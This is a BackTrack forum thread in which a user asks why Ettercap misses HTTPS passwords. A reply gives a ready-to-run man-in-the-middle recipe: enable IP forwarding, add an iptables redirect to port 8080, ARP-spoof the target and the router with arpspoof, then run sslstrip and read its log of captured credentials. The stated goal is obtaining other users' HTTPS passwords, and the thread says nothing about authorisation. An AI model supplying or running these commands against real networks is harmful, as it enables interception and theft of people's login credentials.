Results 1 to 3 of 3

Thread: Ettercap No https password SSL ?

  1. #1
    Just burned his ISO
    Join Date
    Jan 2011

    Default Ettercap No https password SSL ?


    With ettercap im not getting Https passwords like and
    I only get normal plain text passwords

    I changed in /etc/etter.conf
    ec_uid = 0
    ec_gid = 0

    and also

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %por$
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %po$

    Also did ip forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward

    Is there anything that needs to be changed ? i also dont get the Fake authentication script if i visit https website's..

    Hope somebody can help me,

    Thank you

    Is there anything

  2. #2
    Just burned his ISO
    Join Date
    Dec 2010

    Default Re: Ettercap No https password SSL ?

    To get the passwords of a user going to an https site, you need to get around that SSL encryption.

    There's an app for that. It's called sslstrip, and it's included in backtrack.
    Also, as a side note, ettercap has a habit of disabling packet forwarding when it is run, so double check your settings after you run it and re-enable it afterwards, or don't use ettercap at all.

    Here's a quick and dirty tutorial using arpspoof and sslstrip. Both come with Backtrack 4 R2:

    This example assumes a wired connection to the router.

    Open a console and type:
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    arpspoof -i eth0 -t (target IP) (router IP)
    In a new console:
    cd /usr/bin/ && ./sslstrip -l 8080 -w /root/sslstrip.log
    In one last console (So many consoles! I said quick and dirty)
    cat /root/sslstrip.log
    To view results. ^^^

  3. #3
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Behind the screen.

    Default Re: Ettercap No https password SSL ?

    This topic has already been covered a lot of times, there are also video tutorials about this.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

Similar Threads

  1. Ettercap not capturing HTTP or HTTPS
    By falseteeth in forum Beginners Forum
    Replies: 1
    Last Post: 08-04-2010, 03:45 AM
  2. sniffing, ettercap, https, ssl
    By theoleek in forum OLD Newbie Area
    Replies: 1
    Last Post: 10-25-2009, 01:27 AM
  3. ettercap cleartext password
    By amarino2 in forum OLD Newbie Area
    Replies: 2
    Last Post: 03-30-2009, 06:37 PM
  4. ettercap, https
    By theoleek in forum OLD Newbie Area
    Replies: 8
    Last Post: 11-22-2008, 07:30 PM
  5. ettercap: picks up username, but no password
    By ptewee in forum OLD Specialist Topics
    Replies: 4
    Last Post: 05-20-2008, 08:36 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts